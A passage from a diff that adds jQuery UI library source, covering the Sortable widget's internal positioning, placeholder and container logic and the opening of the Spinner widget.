+		o = o || {};
+
+		items.each(function() { ret.push($(o.item || this).attr(o.attribute || "id") || ""); });
+		return ret;
+
+	},
+
+	/* Be careful with the following core functions */
+	_intersectsWith: function(item) {
+
+		var x1 = this.positionAbs.left,
+			x2 = x1 + this.helperProportions.width,
+			y1 = this.positionAbs.top,
+			y2 = y1 + this.helperProportions.height,
+			l = item.left,
+			r = l + item.width,
+			t = item.top,
+			b = t + item.height,
+			dyClick = this.offset.click.top,
+			dxClick = this.offset.click.left,
+			isOverElementHeight = ( this.options.axis === "x" ) || ( ( y1 + dyClick ) > t && ( y1 + dyClick ) < b ),
+			isOverElementWidth = ( this.options.axis === "y" ) || ( ( x1 + dxClick ) > l && ( x1 + dxClick ) < r ),
+			isOverElement = isOverElementHeight && isOverElementWidth;
+
+		if ( this.options.tolerance === "pointer" ||
+			this.options.forcePointerForContainers ||
+			(this.options.tolerance !== "pointer" && this.helperProportions[this.floating ? "width" : "height"] > item[this.floating ? "width" : "height"])
+		) {
+			return isOverElement;
+		} else {
+
+			return (l < x1 + (this.helperProportions.width / 2) && // Right Half
+				x2 - (this.helperProportions.width / 2) < r && // Left Half
+				t < y1 + (this.helperProportions.height / 2) && // Bottom Half
+				y2 - (this.helperProportions.height / 2) < b ); // Top Half
+
+		}
+	},
+
+	_intersectsWithPointer: function(item) {
+
+		var isOverElementHeight = (this.options.axis === "x") || this._isOverAxis(this.positionAbs.top + this.offset.click.top, item.top, item.height),
+			isOverElementWidth = (this.options.axis === "y") || this._isOverAxis(this.positionAbs.left + this.offset.click.left, item.left, item.width),
+			isOverElement = isOverElementHeight && isOverElementWidth,
+			verticalDirection = this._getDragVerticalDirection(),
+			horizontalDirection = this._getDragHorizontalDirection();
+
+		if (!isOverElement) {
+			return false;
+		}
+
+		return this.floating ?
+			( ((horizontalDirection && horizontalDirection === "right") || verticalDirection === "down") ? 2 : 1 )
+			: ( verticalDirection && (verticalDirection === "down" ? 2 : 1) );
+
+	},
+
+	_intersectsWithSides: function(item) {
+
+		var isOverBottomHalf = this._isOverAxis(this.positionAbs.top + this.offset.click.top, item.top + (item.height/2), item.height),
+			isOverRightHalf = this._isOverAxis(this.positionAbs.left + this.offset.click.left, item.left + (item.width/2), item.width),
+			verticalDirection = this._getDragVerticalDirection(),
+			horizontalDirection = this._getDragHorizontalDirection();
+
+		if (this.floating && horizontalDirection) {
+			return ((horizontalDirection === "right" && isOverRightHalf) || (horizontalDirection === "left" && !isOverRightHalf));
+		} else {
+			return verticalDirection && ((verticalDirection === "down" && isOverBottomHalf) || (verticalDirection === "up" && !isOverBottomHalf));
+		}
+
+	},
+
+	_getDragVerticalDirection: function() {
+		var delta = this.positionAbs.top - this.lastPositionAbs.top;
+		return delta !== 0 && (delta > 0 ? "down" : "up");
+	},
+
+	_getDragHorizontalDirection: function() {
+		var delta = this.positionAbs.left - this.lastPositionAbs.left;
+		return delta !== 0 && (delta > 0 ? "right" : "left");
+	},
+
+	refresh: function(event) {
+		this._refreshItems(event);
+		this._setHandleClassName();
+		this.refreshPositions();
+		return this;
+	},
+
+	_connectWith: function() {
+		var options = this.options;
+		return options.connectWith.constructor === String ? [options.connectWith] : options.connectWith;
+	},
+
+	_getItemsAsjQuery: function(connected) {
+
+		var i, j, cur, inst,
+			items = [],
+			queries = [],
+			connectWith = this._connectWith();
+
+		if(connectWith && connected) {
+			for (i = connectWith.length - 1; i >= 0; i--){
+				cur = $(connectWith[i], this.document[0]);
+				for ( j = cur.length - 1; j >= 0; j--){
+					inst = $.data(cur[j], this.widgetFullName);
+					if(inst && inst !== this && !inst.options.disabled) {
+						queries.push([$.isFunction(inst.options.items) ? inst.options.items.call(inst.element) : $(inst.options.items, inst.element).not(".ui-sortable-helper").not(".ui-sortable-placeholder"), inst]);
+					}
+				}
+			}
+		}
+
+		queries.push([$.isFunction(this.options.items) ? this.options.items.call(this.element, null, { options: this.options, item: this.currentItem }) : $(this.options.items, this.element).not(".ui-sortable-helper").not(".ui-sortable-placeholder"), this]);
+
+		function addItems() {
+			items.push( this );
+		}
+		for (i = queries.length - 1; i >= 0; i--){
+			queries[i][0].each( addItems );
+		}
+
+		return $(items);
+
+	},
+
+	_removeCurrentsFromItems: function() {
+
+		var list = this.currentItem.find(":data(" + this.widgetName + "-item)");
+
+		this.items = $.grep(this.items, function (item) {
+			for (var j=0; j < list.length; j++) {
+				if(list[j] === item.item[0]) {
+					return false;
+				}
+			}
+			return true;
+		});
+
+	},
+
+	_refreshItems: function(event) {
+
+		this.items = [];
+		this.containers = [this];
+
+		var i, j, cur, inst, targetData, _queries, item, queriesLength,
+			items = this.items,
+			queries = [[$.isFunction(this.options.items) ? this.options.items.call(this.element[0], event, { item: this.currentItem }) : $(this.options.items, this.element), this]],
+			connectWith = this._connectWith();
+
+		if(connectWith && this.ready) { //Shouldn't be run the first time through due to massive slow-down
+			for (i = connectWith.length - 1; i >= 0; i--){
+				cur = $(connectWith[i], this.document[0]);
+				for (j = cur.length - 1; j >= 0; j--){
+					inst = $.data(cur[j], this.widgetFullName);
+					if(inst && inst !== this && !inst.options.disabled) {
+						queries.push([$.isFunction(inst.options.items) ? inst.options.items.call(inst.element[0], event, { item: this.currentItem }) : $(inst.options.items, inst.element), inst]);
+						this.containers.push(inst);
+					}
+				}
+			}
+		}
+
+		for (i = queries.length - 1; i >= 0; i--) {
+			targetData = queries[i][1];
+			_queries = queries[i][0];
+
+			for (j=0, queriesLength = _queries.length; j < queriesLength; j++) {
+				item = $(_queries[j]);
+
+				item.data(this.widgetName + "-item", targetData); // Data for target checking (mouse manager)
+
+				items.push({
+					item: item,
+					instance: targetData,
+					width: 0, height: 0,
+					left: 0, top: 0
+				});
+			}
+		}
+
+	},
+
+	refreshPositions: function(fast) {
+
+		//This has to be redone because due to the item being moved out/into the offsetParent, the offsetParent's position will change
+		if(this.offsetParent && this.helper) {
+			this.offset.parent = this._getParentOffset();
+		}
+
+		var i, item, t, p;
+
+		for (i = this.items.length - 1; i >= 0; i--){
+			item = this.items[i];
+
+			//We ignore calculating positions of all connected containers when we're not over them
+			if(item.instance !== this.currentContainer && this.currentContainer && item.item[0] !== this.currentItem[0]) {
+				continue;
+			}
+
+			t = this.options.toleranceElement ? $(this.options.toleranceElement, item.item) : item.item;
+
+			if (!fast) {
+				item.width = t.outerWidth();
+				item.height = t.outerHeight();
+			}
+
+			p = t.offset();
+			item.left = p.left;
+			item.top = p.top;
+		}
+
+		if(this.options.custom && this.options.custom.refreshContainers) {
+			this.options.custom.refreshContainers.call(this);
+		} else {
+			for (i = this.containers.length - 1; i >= 0; i--){
+				p = this.containers[i].element.offset();
+				this.containers[i].containerCache.left = p.left;
+				this.containers[i].containerCache.top = p.top;
+				this.containers[i].containerCache.width = this.containers[i].element.outerWidth();
+				this.containers[i].containerCache.height = this.containers[i].element.outerHeight();
+			}
+		}
+
+		return this;
+	},
+
+	_createPlaceholder: function(that) {
+		that = that || this;
+		var className,
+			o = that.options;
+
+		if(!o.placeholder || o.placeholder.constructor === String) {
+			className = o.placeholder;
+			o.placeholder = {
+				element: function() {
+
+					var nodeName = that.currentItem[0].nodeName.toLowerCase(),
+						element = $( "<" + nodeName + ">", that.document[0] )
+							.addClass(className || that.currentItem[0].className+" ui-sortable-placeholder")
+							.removeClass("ui-sortable-helper");
+
+					if ( nodeName === "tr" ) {
+						that.currentItem.children().each(function() {
+							$( "<td>&#160;</td>", that.document[0] )
+								.attr( "colspan", $( this ).attr( "colspan" ) || 1 )
+								.appendTo( element );
+						});
+					} else if ( nodeName === "img" ) {
+						element.attr( "src", that.currentItem.attr( "src" ) );
+					}
+
+					if ( !className ) {
+						element.css( "visibility", "hidden" );
+					}
+
+					return element;
+				},
+				update: function(container, p) {
+
+					// 1. If a className is set as 'placeholder option, we don't force sizes - the class is responsible for that
+					// 2. The option 'forcePlaceholderSize can be enabled to force it even if a class name is specified
+					if(className && !o.forcePlaceholderSize) {
+						return;
+					}
+
+					//If the element doesn't have a actual height by itself (without styles coming from a stylesheet), it receives the inline height from the dragged item
+					if(!p.height()) { p.height(that.currentItem.innerHeight() - parseInt(that.currentItem.css("paddingTop")||0, 10) - parseInt(that.currentItem.css("paddingBottom")||0, 10)); }
+					if(!p.width()) { p.width(that.currentItem.innerWidth() - parseInt(that.currentItem.css("paddingLeft")||0, 10) - parseInt(that.currentItem.css("paddingRight")||0, 10)); }
+				}
+			};
+		}
+
+		//Create the placeholder
+		that.placeholder = $(o.placeholder.element.call(that.element, that.currentItem));
+
+		//Append it after the actual current item
+		that.currentItem.after(that.placeholder);
+
+		//Update the size of the placeholder (TODO: Logic to fuzzy, see line 316/317)
+		o.placeholder.update(that, that.placeholder);
+
+	},
+
+	_contactContainers: function(event) {
+		var i, j, dist, itemWithLeastDistance, posProperty, sizeProperty, cur, nearBottom, floating, axis,
+			innermostContainer = null,
+			innermostIndex = null;
+
+		// get innermost container that intersects with item
+		for (i = this.containers.length - 1; i >= 0; i--) {
+
+			// never consider a container that's located within the item itself
+			if($.contains(this.currentItem[0], this.containers[i].element[0])) {
+				continue;
+			}
+
+			if(this._intersectsWith(this.containers[i].containerCache)) {
+
+				// if we've already found a container and it's more "inner" than this, then continue
+				if(innermostContainer && $.contains(this.containers[i].element[0], innermostContainer.element[0])) {
+					continue;
+				}
+
+				innermostContainer = this.containers[i];
+				innermostIndex = i;
+
+			} else {
+				// container doesn't intersect. trigger "out" event if necessary
+				if(this.containers[i].containerCache.over) {
+					this.containers[i]._trigger("out", event, this._uiHash(this));
+					this.containers[i].containerCache.over = 0;
+				}
+			}
+
+		}
+
+		// if no intersecting containers found, return
+		if(!innermostContainer) {
+			return;
+		}
+
+		// move the item into the container if it's not there already
+		if(this.containers.length === 1) {
+			if (!this.containers[innermostIndex].containerCache.over) {
+				this.containers[innermostIndex]._trigger("over", event, this._uiHash(this));
+				this.containers[innermostIndex].containerCache.over = 1;
+			}
+		} else {
+
+			//When entering a new container, we will find the item with the least distance and append our item near it
+			dist = 10000;
+			itemWithLeastDistance = null;
+			floating = innermostContainer.floating || this._isFloating(this.currentItem);
+			posProperty = floating ? "left" : "top";
+			sizeProperty = floating ? "width" : "height";
+			axis = floating ? "clientX" : "clientY";
+
+			for (j = this.items.length - 1; j >= 0; j--) {
+				if(!$.contains(this.containers[innermostIndex].element[0], this.items[j].item[0])) {
+					continue;
+				}
+				if(this.items[j].item[0] === this.currentItem[0]) {
+					continue;
+				}
+
+				cur = this.items[j].item.offset()[posProperty];
+				nearBottom = false;
+				if ( event[ axis ] - cur > this.items[ j ][ sizeProperty ] / 2 ) {
+					nearBottom = true;
+				}
+
+				if ( Math.abs( event[ axis ] - cur ) < dist ) {
+					dist = Math.abs( event[ axis ] - cur );
+					itemWithLeastDistance = this.items[ j ];
+					this.direction = nearBottom ? "up": "down";
+				}
+			}
+
+			//Check if dropOnEmpty is enabled
+			if(!itemWithLeastDistance && !this.options.dropOnEmpty) {
+				return;
+			}
+
+			if(this.currentContainer === this.containers[innermostIndex]) {
+				if ( !this.currentContainer.containerCache.over ) {
+					this.containers[ innermostIndex ]._trigger( "over", event, this._uiHash() );
+					this.currentContainer.containerCache.over = 1;
+				}
+				return;
+			}
+
+			itemWithLeastDistance ? this._rearrange(event, itemWithLeastDistance, null, true) : this._rearrange(event, null, this.containers[innermostIndex].element, true);
+			this._trigger("change", event, this._uiHash());
+			this.containers[innermostIndex]._trigger("change", event, this._uiHash(this));
+			this.currentContainer = this.containers[innermostIndex];
+
+			//Update the placeholder
+			this.options.placeholder.update(this.currentContainer, this.placeholder);
+
+			this.containers[innermostIndex]._trigger("over", event, this._uiHash(this));
+			this.containers[innermostIndex].containerCache.over = 1;
+		}
+
+
+	},
+
+	_createHelper: function(event) {
+
+		var o = this.options,
+			helper = $.isFunction(o.helper) ? $(o.helper.apply(this.element[0], [event, this.currentItem])) : (o.helper === "clone" ? this.currentItem.clone() : this.currentItem);
+
+		//Add the helper to the DOM if that didn't happen already
+		if(!helper.parents("body").length) {
+			$(o.appendTo !== "parent" ? o.appendTo : this.currentItem[0].parentNode)[0].appendChild(helper[0]);
+		}
+
+		if(helper[0] === this.currentItem[0]) {
+			this._storedCSS = { width: this.currentItem[0].style.width, height: this.currentItem[0].style.height, position: this.currentItem.css("position"), top: this.currentItem.css("top"), left: this.currentItem.css("left") };
+		}
+
+		if(!helper[0].style.width || o.forceHelperSize) {
+			helper.width(this.currentItem.width());
+		}
+		if(!helper[0].style.height || o.forceHelperSize) {
+			helper.height(this.currentItem.height());
+		}
+
+		return helper;
+
+	},
+
+	_adjustOffsetFromHelper: function(obj) {
+		if (typeof obj === "string") {
+			obj = obj.split(" ");
+		}
+		if ($.isArray(obj)) {
+			obj = {left: +obj[0], top: +obj[1] || 0};
+		}
+		if ("left" in obj) {
+			this.offset.click.left = obj.left + this.margins.left;
+		}
+		if ("right" in obj) {
+			this.offset.click.left = this.helperProportions.width - obj.right + this.margins.left;
+		}
+		if ("top" in obj) {
+			this.offset.click.top = obj.top + this.margins.top;
+		}
+		if ("bottom" in obj) {
+			this.offset.click.top = this.helperProportions.height - obj.bottom + this.margins.top;
+		}
+	},
+
+	_getParentOffset: function() {
+
+
+		//Get the offsetParent and cache its position
+		this.offsetParent = this.helper.offsetParent();
+		var po = this.offsetParent.offset();
+
+		// This is a special case where we need to modify a offset calculated on start, since the following happened:
+		// 1. The position of the helper is absolute, so it's position is calculated based on the next positioned parent
+		// 2. The actual offset parent is a child of the scroll parent, and the scroll parent isn't the document, which means that
+		//    the scroll is included in the initial calculation of the offset of the parent, and never recalculated upon drag
+		if(this.cssPosition === "absolute" && this.scrollParent[0] !== this.document[0] && $.contains(this.scrollParent[0], this.offsetParent[0])) {
+			po.left += this.scrollParent.scrollLeft();
+			po.top += this.scrollParent.scrollTop();
+		}
+
+		// This needs to be actually done for all browsers, since pageX/pageY includes this information
+		// with an ugly IE fix
+		if( this.offsetParent[0] === this.document[0].body || (this.offsetParent[0].tagName && this.offsetParent[0].tagName.toLowerCase() === "html" && $.ui.ie)) {
+			po = { top: 0, left: 0 };
+		}
+
+		return {
+			top: po.top + (parseInt(this.offsetParent.css("borderTopWidth"),10) || 0),
+			left: po.left + (parseInt(this.offsetParent.css("borderLeftWidth"),10) || 0)
+		};
+
+	},
+
+	_getRelativeOffset: function() {
+
+		if(this.cssPosition === "relative") {
+			var p = this.currentItem.position();
+			return {
+				top: p.top - (parseInt(this.helper.css("top"),10) || 0) + this.scrollParent.scrollTop(),
+				left: p.left - (parseInt(this.helper.css("left"),10) || 0) + this.scrollParent.scrollLeft()
+			};
+		} else {
+			return { top: 0, left: 0 };
+		}
+
+	},
+
+	_cacheMargins: function() {
+		this.margins = {
+			left: (parseInt(this.currentItem.css("marginLeft"),10) || 0),
+			top: (parseInt(this.currentItem.css("marginTop"),10) || 0)
+		};
+	},
+
+	_cacheHelperProportions: function() {
+		this.helperProportions = {
+			width: this.helper.outerWidth(),
+			height: this.helper.outerHeight()
+		};
+	},
+
+	_setContainment: function() {
+
+		var ce, co, over,
+			o = this.options;
+		if(o.containment === "parent") {
+			o.containment = this.helper[0].parentNode;
+		}
+		if(o.containment === "document" || o.containment === "window") {
+			this.containment = [
+				0 - this.offset.relative.left - this.offset.parent.left,
+				0 - this.offset.relative.top - this.offset.parent.top,
+				o.containment === "document" ? this.document.width() : this.window.width() - this.helperProportions.width - this.margins.left,
+				(o.containment === "document" ? this.document.width() : this.window.height() || this.document[0].body.parentNode.scrollHeight) - this.helperProportions.height - this.margins.top
+			];
+		}
+
+		if(!(/^(document|window|parent)$/).test(o.containment)) {
+			ce = $(o.containment)[0];
+			co = $(o.containment).offset();
+			over = ($(ce).css("overflow") !== "hidden");
+
+			this.containment = [
+				co.left + (parseInt($(ce).css("borderLeftWidth"),10) || 0) + (parseInt($(ce).css("paddingLeft"),10) || 0) - this.margins.left,
+				co.top + (parseInt($(ce).css("borderTopWidth"),10) || 0) + (parseInt($(ce).css("paddingTop"),10) || 0) - this.margins.top,
+				co.left+(over ? Math.max(ce.scrollWidth,ce.offsetWidth) : ce.offsetWidth) - (parseInt($(ce).css("borderLeftWidth"),10) || 0) - (parseInt($(ce).css("paddingRight"),10) || 0) - this.helperProportions.width - this.margins.left,
+				co.top+(over ? Math.max(ce.scrollHeight,ce.offsetHeight) : ce.offsetHeight) - (parseInt($(ce).css("borderTopWidth"),10) || 0) - (parseInt($(ce).css("paddingBottom"),10) || 0) - this.helperProportions.height - this.margins.top
+			];
+		}
+
+	},
+
+	_convertPositionTo: function(d, pos) {
+
+		if(!pos) {
+			pos = this.position;
+		}
+		var mod = d === "absolute" ? 1 : -1,
+			scroll = this.cssPosition === "absolute" && !(this.scrollParent[0] !== this.document[0] && $.contains(this.scrollParent[0], this.offsetParent[0])) ? this.offsetParent : this.scrollParent,
+			scrollIsRootNode = (/(html|body)/i).test(scroll[0].tagName);
+
+		return {
+			top: (
+				pos.top	+																// The absolute mouse position
+				this.offset.relative.top * mod +										// Only for relative positioned nodes: Relative offset from element to offset parent
+				this.offset.parent.top * mod -											// The offsetParent's offset without borders (offset + border)
+				( ( this.cssPosition === "fixed" ? -this.scrollParent.scrollTop() : ( scrollIsRootNode ? 0 : scroll.scrollTop() ) ) * mod)
+			),
+			left: (
+				pos.left +																// The absolute mouse position
+				this.offset.relative.left * mod +										// Only for relative positioned nodes: Relative offset from element to offset parent
+				this.offset.parent.left * mod	-										// The offsetParent's offset without borders (offset + border)
+				( ( this.cssPosition === "fixed" ? -this.scrollParent.scrollLeft() : scrollIsRootNode ? 0 : scroll.scrollLeft() ) * mod)
+			)
+		};
+
+	},
+
+	_generatePosition: function(event) {
+
+		var top, left,
+			o = this.options,
+			pageX = event.pageX,
+			pageY = event.pageY,
+			scroll = this.cssPosition === "absolute" && !(this.scrollParent[0] !== this.document[0] && $.contains(this.scrollParent[0], this.offsetParent[0])) ? this.offsetParent : this.scrollParent, scrollIsRootNode = (/(html|body)/i).test(scroll[0].tagName);
+
+		// This is another very weird special case that only happens for relative elements:
+		// 1. If the css position is relative
+		// 2. and the scroll parent is the document or similar to the offset parent
+		// we have to refresh the relative offset during the scroll so there are no jumps
+		if(this.cssPosition === "relative" && !(this.scrollParent[0] !== this.document[0] && this.scrollParent[0] !== this.offsetParent[0])) {
+			this.offset.relative = this._getRelativeOffset();
+		}
+
+		/*
+		 * - Position constraining -
+		 * Constrain the position to a mix of grid, containment.
+		 */
+
+		if(this.originalPosition) { //If we are not dragging yet, we won't check for options
+
+			if(this.containment) {
+				if(event.pageX - this.offset.click.left < this.containment[0]) {
+					pageX = this.containment[0] + this.offset.click.left;
+				}
+				if(event.pageY - this.offset.click.top < this.containment[1]) {
+					pageY = this.containment[1] + this.offset.click.top;
+				}
+				if(event.pageX - this.offset.click.left > this.containment[2]) {
+					pageX = this.containment[2] + this.offset.click.left;
+				}
+				if(event.pageY - this.offset.click.top > this.containment[3]) {
+					pageY = this.containment[3] + this.offset.click.top;
+				}
+			}
+
+			if(o.grid) {
+				top = this.originalPageY + Math.round((pageY - this.originalPageY) / o.grid[1]) * o.grid[1];
+				pageY = this.containment ? ( (top - this.offset.click.top >= this.containment[1] && top - this.offset.click.top <= this.containment[3]) ? top : ((top - this.offset.click.top >= this.containment[1]) ? top - o.grid[1] : top + o.grid[1])) : top;
+
+				left = this.originalPageX + Math.round((pageX - this.originalPageX) / o.grid[0]) * o.grid[0];
+				pageX = this.containment ? ( (left - this.offset.click.left >= this.containment[0] && left - this.offset.click.left <= this.containment[2]) ? left : ((left - this.offset.click.left >= this.containment[0]) ? left - o.grid[0] : left + o.grid[0])) : left;
+			}
+
+		}
+
+		return {
+			top: (
+				pageY -																// The absolute mouse position
+				this.offset.click.top -													// Click offset (relative to the element)
+				this.offset.relative.top	-											// Only for relative positioned nodes: Relative offset from element to offset parent
+				this.offset.parent.top +												// The offsetParent's offset without borders (offset + border)
+				( ( this.cssPosition === "fixed" ? -this.scrollParent.scrollTop() : ( scrollIsRootNode ? 0 : scroll.scrollTop() ) ))
+			),
+			left: (
+				pageX -																// The absolute mouse position
+				this.offset.click.left -												// Click offset (relative to the element)
+				this.offset.relative.left	-											// Only for relative positioned nodes: Relative offset from element to offset parent
+				this.offset.parent.left +												// The offsetParent's offset without borders (offset + border)
+				( ( this.cssPosition === "fixed" ? -this.scrollParent.scrollLeft() : scrollIsRootNode ? 0 : scroll.scrollLeft() ))
+			)
+		};
+
+	},
+
+	_rearrange: function(event, i, a, hardRefresh) {
+
+		a ? a[0].appendChild(this.placeholder[0]) : i.item[0].parentNode.insertBefore(this.placeholder[0], (this.direction === "down" ? i.item[0] : i.item[0].nextSibling));
+
+		//Various things done here to improve the performance:
+		// 1. we create a setTimeout, that calls refreshPositions
+		// 2. on the instance, we have a counter variable, that get's higher after every append
+		// 3. on the local scope, we copy the counter variable, and check in the timeout, if it's still the same
+		// 4. this lets only the last addition to the timeout stack through
+		this.counter = this.counter ? ++this.counter : 1;
+		var counter = this.counter;
+
+		this._delay(function() {
+			if(counter === this.counter) {
+				this.refreshPositions(!hardRefresh); //Precompute after each DOM insertion, NOT on mousemove
+			}
+		});
+
+	},
+
+	_clear: function(event, noPropagation) {
+
+		this.reverting = false;
+		// We delay all events that have to be triggered to after the point where the placeholder has been removed and
+		// everything else normalized again
+		var i,
+			delayedTriggers = [];
+
+		// We first have to update the dom position of the actual currentItem
+		// Note: don't do it if the current item is already removed (by a user), or it gets reappended (see #4088)
+		if(!this._noFinalSort && this.currentItem.parent().length) {
+			this.placeholder.before(this.currentItem);
+		}
+		this._noFinalSort = null;
+
+		if(this.helper[0] === this.currentItem[0]) {
+			for(i in this._storedCSS) {
+				if(this._storedCSS[i] === "auto" || this._storedCSS[i] === "static") {
+					this._storedCSS[i] = "";
+				}
+			}
+			this.currentItem.css(this._storedCSS).removeClass("ui-sortable-helper");
+		} else {
+			this.currentItem.show();
+		}
+
+		if(this.fromOutside && !noPropagation) {
+			delayedTriggers.push(function(event) { this._trigger("receive", event, this._uiHash(this.fromOutside)); });
+		}
+		if((this.fromOutside || this.domPosition.prev !== this.currentItem.prev().not(".ui-sortable-helper")[0] || this.domPosition.parent !== this.currentItem.parent()[0]) && !noPropagation) {
+			delayedTriggers.push(function(event) { this._trigger("update", event, this._uiHash()); }); //Trigger update callback if the DOM position has changed
+		}
+
+		// Check if the items Container has Changed and trigger appropriate
+		// events.
+		if (this !== this.currentContainer) {
+			if(!noPropagation) {
+				delayedTriggers.push(function(event) { this._trigger("remove", event, this._uiHash()); });
+				delayedTriggers.push((function(c) { return function(event) { c._trigger("receive", event, this._uiHash(this)); };  }).call(this, this.currentContainer));
+				delayedTriggers.push((function(c) { return function(event) { c._trigger("update", event, this._uiHash(this));  }; }).call(this, this.currentContainer));
+			}
+		}
+
+
+		//Post events to containers
+		function delayEvent( type, instance, container ) {
+			return function( event ) {
+				container._trigger( type, event, instance._uiHash( instance ) );
+			};
+		}
+		for (i = this.containers.length - 1; i >= 0; i--){
+			if (!noPropagation) {
+				delayedTriggers.push( delayEvent( "deactivate", this, this.containers[ i ] ) );
+			}
+			if(this.containers[i].containerCache.over) {
+				delayedTriggers.push( delayEvent( "out", this, this.containers[ i ] ) );
+				this.containers[i].containerCache.over = 0;
+			}
+		}
+
+		//Do what was originally in plugins
+		if ( this.storedCursor ) {
+			this.document.find( "body" ).css( "cursor", this.storedCursor );
+			this.storedStylesheet.remove();
+		}
+		if(this._storedOpacity) {
+			this.helper.css("opacity", this._storedOpacity);
+		}
+		if(this._storedZIndex) {
+			this.helper.css("zIndex", this._storedZIndex === "auto" ? "" : this._storedZIndex);
+		}
+
+		this.dragging = false;
+
+		if(!noPropagation) {
+			this._trigger("beforeStop", event, this._uiHash());
+		}
+
+		//$(this.placeholder[0]).remove(); would have been the jQuery way - unfortunately, it unbinds ALL events from the original node!
+		this.placeholder[0].parentNode.removeChild(this.placeholder[0]);
+
+		if ( !this.cancelHelperRemoval ) {
+			if ( this.helper[ 0 ] !== this.currentItem[ 0 ] ) {
+				this.helper.remove();
+			}
+			this.helper = null;
+		}
+
+		if(!noPropagation) {
+			for (i=0; i < delayedTriggers.length; i++) {
+				delayedTriggers[i].call(this, event);
+			} //Trigger all delayed events
+			this._trigger("stop", event, this._uiHash());
+		}
+
+		this.fromOutside = false;
+		return !this.cancelHelperRemoval;
+
+	},
+
+	_trigger: function() {
+		if ($.Widget.prototype._trigger.apply(this, arguments) === false) {
+			this.cancel();
+		}
+	},
+
+	_uiHash: function(_inst) {
+		var inst = _inst || this;
+		return {
+			helper: inst.helper,
+			placeholder: inst.placeholder || $([]),
+			position: inst.position,
+			originalPosition: inst.originalPosition,
+			offset: inst.positionAbs,
+			item: inst.currentItem,
+			sender: _inst ? _inst.element : null
+		};
+	}
+
+});
+
+
+/*!
+ * jQuery UI Spinner 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/spinner/
+ */
+
+
+function spinner_modifier( fn ) {
+	return function() {
+		var previous = this.element.val();
+		fn.apply( this, arguments );
+		this._refresh();
+		if ( previous !== this.element.val() ) {
+			this._trigger( "change" );
+		}
+	};
+}
+
+var spinner = $.widget( "ui.spinner", {
+	version: "1.11.3",
+	defaultElement: "<input>",
+	widgetEventPrefix: "spin",
+	options: {
+		culture: null,
+		icons: {
+			down: "ui-icon-triangle-1-s",
+			up: "ui-icon-triangle-1-n"
+		},
+		incremental: true,
+		max: null,
+		min: null,
+		numberFormat: null,
+		page: 10,
+		step: 1,
+
+		change: null,
+		spin: null,
+		start: null,
+		stop: null
+	},
+
+	_create: function() {
+		// handle string values that need to be parsed
+		this._setOption( "max", this.options.max );
+		this._setOption( "min", this.options.min );
+		this._setOption( "step", this.options.step );
+
+		// Only format if there is a value, prevents the field from being marked
+		// as invalid in Firefox, see #9573.
+		if ( this.value() !== "" ) {
+			// Format the value, but don't constrain.
+			this._value( this.element.val(), true );
+		}
+
+		this._draw();
+		this._on( this._events );
+		this._refresh();
+
+		// turning off autocomplete prevents the browser from remembering the
+		// value when navigating through history, so we re-enable autocomplete
+		// if the page is unloaded before the widget is destroyed. #7790
+		this._on( this.window, {
+			beforeunload: function() {
+				this.element.removeAttr( "autocomplete" );
+			}
+		});
+	},
+
+	_getCreateOptions: function() {
+		var options = {},
+			element = this.element;
+
+		$.each( [ "min", "max", "step" ], function( i, option ) {
+			var value = element.attr( option );
+			if ( value !== undefined && value.length ) {
+				options[ option ] = value;
+			}
+		});
+
+		return options;
+	},
+
+	_events: {
+		keydown: function( event ) {
+			if ( this._start( event ) && this._keydown( event ) ) {
+				event.preventDefault();
+			}
+		},
+		keyup: "_stop",
+		focus: function() {
+			this.previous = this.element.val();
+		},
+		blur: function( event ) {
+			if ( this.cancelBlur ) {
+				delete this.cancelBlur;
+				return;
+			}
+
+			this._stop();
+			this._refresh();
+			if ( this.previous !== this.element.val() ) {
+				this._trigger( "change", event );
+			}
+		},
+		mousewheel: function( event, delta ) {
+			if ( !delta ) {
+				return;
+			}
+			if ( !this.spinning && !this._start( event ) ) {
+				return false;
+			}
+
+			this._spin( (delta > 0 ? 1 : -1) * this.options.step, event );
+			clearTimeout( this.mousewheelTimer );
+			this.mousewheelTimer = this._delay(function() {
+				if ( this.spinning ) {
+					this._stop( event );
+				}
+			}, 100 );
+			event.preventDefault();
+		},
+		"mousedown .ui-spinner-button": function( event ) {
+			var previous;
+
+			// We never want the buttons to have focus; whenever the user is
+			// interacting with the spinner, the focus should be on the input.
+			// If the input is focused then this.previous is properly set from
+			// when the input first received focus. If the input is not focused
+			// then we need to set this.previous based on the value before spinning.
+			previous = this.element[0] === this.document[0].activeElement ?
+				this.previous : this.element.val();
+			function checkFocus() {
+				var isActive = this.element[0] === this.document[0].activeElement;
+				if ( !isActive ) {
+					this.element.focus();
+					this.previous = previous;
+					// support: IE
+					// IE sets focus asynchronously, so we need to check if focus
+					// moved off of the input because the user clicked on the button.
+					this._delay(function() {
+						this.previous = previous;
+					});
+				}
+			}
+
+			// ensure focus is on (or stays on) the text field
+			event.preventDefault();
+			checkFocus.call( this );
+
+			// support: IE
+			// IE doesn't prevent moving focus even with event.preventDefault()
+			// so we set a flag to know when we should ignore the blur event
+			// and check (again) if focus moved off of the input.
+			this.cancelBlur = true;
+			this._delay(function() {
+				delete this.cancelBlur;
+				checkFocus.call( this );
+			});
+
+			if ( this._start( event ) === false ) {
+				return;
+			}
+
+			this._repeat( null, $( event.currentTarget ).hasClass( "ui-spinner-up" ) ? 1 : -1, event );
+		},
+		"mouseup .ui-spinner-button": "_stop",
+		"mouseenter .ui-spinner-button": function( event ) {
+			// button will add ui-state-active if mouse was down while mouseleave and kept down
+			if ( !$( event.currentTarget ).hasClass( "ui-state-active" ) ) {
+				return;
+			}
+
+			if ( this._start( event ) === false ) {
+				return false;
+			}
+			this._repeat( null, $( event.currentTarget ).hasClass( "ui-spinner-up" ) ? 1 : -1, event );
+		},
+		// TODO: do we really want to consider this a stop?
+		// shouldn't we just stop the repeater and wait until mouseup before
+		// we trigger the stop event?
+		"mouseleave .ui-spinner-button": "_stop"
+	},
+
+	_draw: function() {
+		var uiSpinner = this.uiSpinner = this.element
+			.addClass( "ui-spinner-input" )
+			.attr( "autocomplete", "off" )
+			.wrap( this._uiSpinnerHtml() )
+			.parent()
+				// add buttons
+				.append( this._buttonHtml() );
+
+		this.element.attr( "role", "spinbutton" );
+
+		// button bindings
+		this.buttons = uiSpinner.find( ".ui-spinner-button" )
+			.attr( "tabIndex", -1 )
+			.button()
+			.removeClass( "ui-corner-all" );
+
+		// IE 6 doesn't understand height: 50% for the buttons
+		// unless the wrapper has an explicit height
